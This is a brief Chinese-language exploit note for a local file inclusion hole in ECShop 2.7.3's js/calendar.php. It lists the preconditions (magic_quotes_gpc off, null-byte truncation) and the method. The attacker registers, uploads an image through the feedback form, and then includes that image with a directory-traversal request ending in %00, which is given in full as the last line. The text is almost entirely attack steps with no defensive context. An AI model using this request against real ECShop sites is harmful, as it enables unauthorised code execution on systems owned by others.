ecshop本地js/calendar.php文件包含漏洞

影响版本

Ecshop 2.7.3

需要magic_quotes_gpc = Off

需要%00能够截断

利用方法

js/calendar.php

注册用户,添加留言处添加图片,包含图片

js/calendar.php?lang=../data/feedbackimg/6_20xxsdbg.gif%00